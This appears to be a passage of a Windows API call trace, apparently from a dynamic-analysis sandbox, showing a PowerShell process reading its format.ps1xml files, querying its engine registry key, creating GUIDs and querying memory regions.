	[0144.075] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.075] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.075] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.075] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.076] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0xe67, lpOverlapped=0x0) returned 1
	[0144.076] ReadFile (in: hFile=0x31c, lpBuffer=0x3a1927f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a1927f*, lpNumberOfBytesRead=0x1ccff8*=0x0, lpOverlapped=0x0) returned 1
	[0144.076] ReadFile (in: hFile=0x31c, lpBuffer=0x3a19cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3a19cb0*, lpNumberOfBytesRead=0x1ccff8*=0x0, lpOverlapped=0x0) returned 1
	[0144.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0144.076] SetErrorMode (uMode=0x1) returned 0x1
	[0144.076] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccfa0 | out: lpFileInformation=0x1ccfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0144.077] SetErrorMode (uMode=0x1) returned 0x1
	[0144.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0144.077] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd088 | out: phkResult=0x1cd088*=0x31c) returned 0x0
	[0144.077] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd00c, lpData=0x0, lpcbData=0x1cd008*=0x0 | out: lpType=0x1cd00c*=0x1, lpData=0x0, lpcbData=0x1cd008*=0x56) returned 0x0
	[0144.077] CoTaskMemAlloc (cb=0x5a) returned 0x2ed640
	[0144.077] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccfdc, lpData=0x2ed640, lpcbData=0x1ccfd8*=0x56 | out: lpType=0x1ccfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccfd8*=0x56) returned 0x0
	[0144.077] CoTaskMemFree (pv=0x2ed640) 
	[0144.077] RegCloseKey (hKey=0x31c) returned 0x0
	[0144.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0144.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0144.084] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xcff1710d, Data2=0x3190, Data3=0x41ac, Data4=([0]=0x9b, [1]=0xd8, [2]=0xb7, [3]=0xf1, [4]=0x9d, [5]=0x42, [6]=0x61, [7]=0x43))) returned 0x0
	[0144.085] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x1d397572, Data2=0xd1cf, Data3=0x4db7, Data4=([0]=0xba, [1]=0xec, [2]=0x77, [3]=0xe, [4]=0x7f, [5]=0xdc, [6]=0xbc, [7]=0xc9))) returned 0x0
	[0144.085] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xfb249394, Data2=0xf1d8, Data3=0x476f, Data4=([0]=0x8c, [1]=0x24, [2]=0x32, [3]=0xd, [4]=0x8d, [5]=0x0, [6]=0xdd, [7]=0x73))) returned 0x0
	[0144.085] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x543bdf47, Data2=0xa9, Data3=0x4cae, Data4=([0]=0xbc, [1]=0x28, [2]=0x45, [3]=0xaa, [4]=0x2e, [5]=0x38, [6]=0x3d, [7]=0x95))) returned 0x0
	[0144.085] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xa8b4cabf, Data2=0xc3ef, Data3=0x4380, Data4=([0]=0xbe, [1]=0x65, [2]=0x5d, [3]=0xa2, [4]=0xd9, [5]=0xcf, [6]=0x5c, [7]=0xdf))) returned 0x0
	[0144.086] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x8bcd2379, Data2=0x5254, Data3=0x4104, Data4=([0]=0xb1, [1]=0x5e, [2]=0x1f, [3]=0x3f, [4]=0x77, [5]=0xf9, [6]=0xfd, [7]=0xbc))) returned 0x0
	[0144.087] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x3724bce3, Data2=0xda3, Data3=0x4f4b, Data4=([0]=0xb6, [1]=0xd6, [2]=0x27, [3]=0x2f, [4]=0x46, [5]=0xb, [6]=0x8e, [7]=0x4a))) returned 0x0
	[0144.087] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.089] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x6a44fa63, Data2=0xb34a, Data3=0x490f, Data4=([0]=0xaf, [1]=0x43, [2]=0x6f, [3]=0x10, [4]=0xde, [5]=0xaf, [6]=0xf3, [7]=0x8d))) returned 0x0
	[0144.090] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xfb56adfa, Data2=0x44e4, Data3=0x4db4, Data4=([0]=0xae, [1]=0xc9, [2]=0x9c, [3]=0x4e, [4]=0x69, [5]=0x52, [6]=0x6c, [7]=0x1d))) returned 0x0
	[0144.091] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x5ea39717, Data2=0x8c2a, Data3=0x4656, Data4=([0]=0x8d, [1]=0x96, [2]=0x55, [3]=0x78, [4]=0x9a, [5]=0x57, [6]=0x5c, [7]=0xb0))) returned 0x0
	[0144.092] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xfb1b60b5, Data2=0xb27f, Data3=0x4495, Data4=([0]=0xb8, [1]=0x2d, [2]=0x2a, [3]=0x7d, [4]=0x8c, [5]=0x6d, [6]=0xe2, [7]=0xeb))) returned 0x0
	[0144.093] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x45511393, Data2=0xfce0, Data3=0x48ed, Data4=([0]=0x83, [1]=0x3, [2]=0x27, [3]=0xb7, [4]=0x1f, [5]=0xe7, [6]=0x49, [7]=0xb6))) returned 0x0
	[0144.094] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xe23454e, Data2=0x9561, Data3=0x44eb, Data4=([0]=0xaf, [1]=0xad, [2]=0x9d, [3]=0xef, [4]=0x85, [5]=0x96, [6]=0xe8, [7]=0x50))) returned 0x0
	[0144.095] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xc9f75b84, Data2=0xca71, Data3=0x4886, Data4=([0]=0x8c, [1]=0xd3, [2]=0x45, [3]=0x4, [4]=0xd9, [5]=0x25, [6]=0x24, [7]=0x49))) returned 0x0
	[0144.095] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xc28e113a, Data2=0x9cbe, Data3=0x404d, Data4=([0]=0x91, [1]=0x70, [2]=0xa0, [3]=0xaf, [4]=0x7e, [5]=0x1a, [6]=0x5a, [7]=0xdd))) returned 0x0
	[0144.096] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x14d21b8e, Data2=0x8e72, Data3=0x493f, Data4=([0]=0x85, [1]=0x57, [2]=0xf8, [3]=0xa7, [4]=0xa7, [5]=0x1b, [6]=0x98, [7]=0xff))) returned 0x0
	[0144.096] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x20855f99, Data2=0xa324, Data3=0x40c4, Data4=([0]=0xad, [1]=0x4d, [2]=0x4a, [3]=0xf6, [4]=0x16, [5]=0x17, [6]=0x7e, [7]=0x10))) returned 0x0
	[0144.097] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xa38ff1bb, Data2=0x91de, Data3=0x4461, Data4=([0]=0xa0, [1]=0xa, [2]=0x44, [3]=0x34, [4]=0xeb, [5]=0x1b, [6]=0xa6, [7]=0xce))) returned 0x0
	[0144.097] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x44afd92f, Data2=0x4154, Data3=0x4f97, Data4=([0]=0xa8, [1]=0xa1, [2]=0x2b, [3]=0x6a, [4]=0x10, [5]=0xaa, [6]=0x62, [7]=0x84))) returned 0x0
	[0144.097] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.198] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.198] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.198] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x5bd53c69, Data2=0xa538, Data3=0x4762, Data4=([0]=0xbd, [1]=0xdf, [2]=0x41, [3]=0x2a, [4]=0x63, [5]=0x82, [6]=0xdb, [7]=0x99))) returned 0x0
	[0144.199] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xd8cdc25a, Data2=0x1ff5, Data3=0x4dd7, Data4=([0]=0x88, [1]=0x9c, [2]=0x93, [3]=0x75, [4]=0x96, [5]=0xba, [6]=0x92, [7]=0x92))) returned 0x0
	[0144.199] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x2c5ed1a7, Data2=0x62be, Data3=0x45de, Data4=([0]=0x90, [1]=0x89, [2]=0xdd, [3]=0xef, [4]=0x2d, [5]=0x2b, [6]=0x68, [7]=0xde))) returned 0x0
	[0144.200] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xceeafd83, Data2=0x71c7, Data3=0x47c1, Data4=([0]=0xab, [1]=0xc3, [2]=0xaa, [3]=0xe, [4]=0xaf, [5]=0x52, [6]=0xf5, [7]=0x91))) returned 0x0
	[0144.200] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x54938496, Data2=0x6bb1, Data3=0x4ce0, Data4=([0]=0x98, [1]=0x5c, [2]=0xd8, [3]=0x93, [4]=0xf9, [5]=0xea, [6]=0xf5, [7]=0x26))) returned 0x0
	[0144.200] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x44e283cf, Data2=0x16cb, Data3=0x4df8, Data4=([0]=0x94, [1]=0x63, [2]=0x61, [3]=0xe0, [4]=0x97, [5]=0x0, [6]=0x83, [7]=0x58))) returned 0x0
	[0144.200] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xac0a225d, Data2=0x253, Data3=0x46a7, Data4=([0]=0xad, [1]=0xd2, [2]=0xe1, [3]=0x96, [4]=0x32, [5]=0xef, [6]=0xc, [7]=0x81))) returned 0x0
	[0144.201] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x1cea0d82, Data2=0xef39, Data3=0x486c, Data4=([0]=0xae, [1]=0x7, [2]=0xc6, [3]=0x5f, [4]=0xc7, [5]=0x78, [6]=0xdb, [7]=0x26))) returned 0x0
	[0144.201] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x8524784d, Data2=0x3880, Data3=0x4a9f, Data4=([0]=0x98, [1]=0x79, [2]=0x2a, [3]=0xfd, [4]=0xf3, [5]=0x5, [6]=0x35, [7]=0x7a))) returned 0x0
	[0144.201] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xa3800c6f, Data2=0x6f0c, Data3=0x49a0, Data4=([0]=0xb3, [1]=0x29, [2]=0x5a, [3]=0x3b, [4]=0x14, [5]=0x0, [6]=0x29, [7]=0xd0))) returned 0x0
	[0144.202] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x1f987959, Data2=0x86e4, Data3=0x4b74, Data4=([0]=0xb1, [1]=0x4d, [2]=0x9f, [3]=0xa5, [4]=0xed, [5]=0xb4, [6]=0x10, [7]=0x28))) returned 0x0
	[0144.202] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x9721e758, Data2=0x2952, Data3=0x40c9, Data4=([0]=0x86, [1]=0xaf, [2]=0x7b, [3]=0x18, [4]=0x2f, [5]=0x59, [6]=0x35, [7]=0x9))) returned 0x0
	[0144.202] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xf32b28fb, Data2=0xe147, Data3=0x44d0, Data4=([0]=0x92, [1]=0xb7, [2]=0xd5, [3]=0x5a, [4]=0x2d, [5]=0x3e, [6]=0x9d, [7]=0x50))) returned 0x0
	[0144.202] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.203] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x6738e34d, Data2=0x674, Data3=0x42e3, Data4=([0]=0x81, [1]=0x14, [2]=0x42, [3]=0x15, [4]=0xf9, [5]=0x3c, [6]=0x6d, [7]=0x93))) returned 0x0
	[0144.203] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.205] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.208] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xb421109, Data2=0x134d, Data3=0x43a5, Data4=([0]=0x9f, [1]=0x7f, [2]=0x60, [3]=0x52, [4]=0x28, [5]=0x98, [6]=0x22, [7]=0x2b))) returned 0x0
	[0144.208] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.208] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x67960979, Data2=0x128b, Data3=0x45e8, Data4=([0]=0x85, [1]=0x76, [2]=0x50, [3]=0x4d, [4]=0xff, [5]=0x7f, [6]=0xb3, [7]=0x91))) returned 0x0
	[0144.209] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xcc5f1e4d, Data2=0x1373, Data3=0x4e4f, Data4=([0]=0xbc, [1]=0x4b, [2]=0xd8, [3]=0xe1, [4]=0x33, [5]=0x14, [6]=0xd8, [7]=0xab))) returned 0x0
	[0144.209] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x667d796b, Data2=0x7715, Data3=0x4840, Data4=([0]=0xa2, [1]=0x74, [2]=0xb3, [3]=0x56, [4]=0x9f, [5]=0x1d, [6]=0xdf, [7]=0x6d))) returned 0x0
	[0144.210] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x5a59a4d1, Data2=0x2c5e, Data3=0x40e7, Data4=([0]=0x98, [1]=0xc2, [2]=0xfe, [3]=0xba, [4]=0xee, [5]=0xea, [6]=0xa9, [7]=0xe4))) returned 0x0
	[0144.210] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x8a094c56, Data2=0x9578, Data3=0x497b, Data4=([0]=0xb4, [1]=0x82, [2]=0x35, [3]=0xfb, [4]=0x56, [5]=0x64, [6]=0xac, [7]=0xe2))) returned 0x0
	[0144.210] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xe36c91af, Data2=0x8ba2, Data3=0x4ade, Data4=([0]=0xab, [1]=0x60, [2]=0x1e, [3]=0x52, [4]=0x42, [5]=0x73, [6]=0xbf, [7]=0xec))) returned 0x0
	[0144.210] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xaf18552d, Data2=0x884e, Data3=0x4d5f, Data4=([0]=0xa7, [1]=0x45, [2]=0xfe, [3]=0x73, [4]=0xc3, [5]=0x10, [6]=0xa9, [7]=0x69))) returned 0x0
	[0144.211] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.211] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xaeaa40de, Data2=0x25bf, Data3=0x4970, Data4=([0]=0x9f, [1]=0x98, [2]=0x5f, [3]=0xc, [4]=0xc2, [5]=0x11, [6]=0x16, [7]=0x80))) returned 0x0
	[0144.212] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xace9c4af, Data2=0xcac6, Data3=0x4498, Data4=([0]=0x88, [1]=0x3, [2]=0x8d, [3]=0xa4, [4]=0x22, [5]=0x29, [6]=0xf0, [7]=0xb5))) returned 0x0
	[0144.212] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x221ce952, Data2=0x3524, Data3=0x47df, Data4=([0]=0xa3, [1]=0x8a, [2]=0x91, [3]=0x6e, [4]=0xb3, [5]=0xc5, [6]=0x4d, [7]=0x4d))) returned 0x0
	[0144.212] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xf845036d, Data2=0x17e5, Data3=0x4761, Data4=([0]=0x8a, [1]=0x7b, [2]=0x84, [3]=0xdf, [4]=0xe9, [5]=0x50, [6]=0x7f, [7]=0x3e))) returned 0x0
	[0144.213] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x72f6ea1b, Data2=0x4abb, Data3=0x4571, Data4=([0]=0xa2, [1]=0x66, [2]=0x37, [3]=0x41, [4]=0x26, [5]=0xd1, [6]=0x80, [7]=0x47))) returned 0x0
	[0144.213] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.213] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x2ee85df7, Data2=0xf7d9, Data3=0x40b9, Data4=([0]=0xb2, [1]=0x88, [2]=0xfd, [3]=0x42, [4]=0xa7, [5]=0xaf, [6]=0x65, [7]=0x68))) returned 0x0
	[0144.214] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x57e2c3ab, Data2=0x25e6, Data3=0x4e9d, Data4=([0]=0x91, [1]=0x7e, [2]=0x99, [3]=0x3c, [4]=0xea, [5]=0x86, [6]=0x94, [7]=0xfe))) returned 0x0
	[0144.214] VirtualQuery (in: lpAddress=0x1cbcd0, lpBuffer=0x1ccb90, dwLength=0x30 | out: lpBuffer=0x1ccb90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.214] VirtualQuery (in: lpAddress=0x1cbcd0, lpBuffer=0x1ccb90, dwLength=0x30 | out: lpBuffer=0x1ccb90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.214] VirtualQuery (in: lpAddress=0x1cbcd0, lpBuffer=0x1ccb90, dwLength=0x30 | out: lpBuffer=0x1ccb90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.215] VirtualQuery (in: lpAddress=0x1cbcd0, lpBuffer=0x1ccb90, dwLength=0x30 | out: lpBuffer=0x1ccb90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0144.215] SetErrorMode (uMode=0x1) returned 0x1
	[0144.215] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0144.216] GetFileType (hFile=0x31c) returned 0x1
	[0144.216] SetErrorMode (uMode=0x1) returned 0x1
	[0144.216] GetFileType (hFile=0x31c) returned 0x1
	[0144.216] ReadFile (in: hFile=0x31c, lpBuffer=0x3b77c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3b77c48*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.217] ReadFile (in: hFile=0x31c, lpBuffer=0x3b77c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3b77c48*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.217] ReadFile (in: hFile=0x31c, lpBuffer=0x3b77c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3b77c48*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.218] ReadFile (in: hFile=0x31c, lpBuffer=0x3b77c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3b77c48*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0144.219] ReadFile (in: hFile=0x31c, lpBuffer=0x3b77c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3b77c48*, lpNumberOfBytesRead=0x1ccff8*=0x8b4, lpOverlapped=0x0) returned 1
	[0144.219] ReadFile (in: hFile=0x31c, lpBuffer=0x3b77064, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3b77064*, lpNumberOfBytesRead=0x1ccff8*=0x0, lpOverlapped=0x0) returned 1
	[0144.219] ReadFile (in: hFile=0x31c, lpBuffer=0x3b77c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3b77c48*, lpNumberOfBytesRead=0x1ccff8*=0x0, lpOverlapped=0x0) returned 1
	[0144.219] CloseHandle (hObject=0x31c) returned 1
	[0144.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0144.220] SetErrorMode (uMode=0x1) returned 0x1
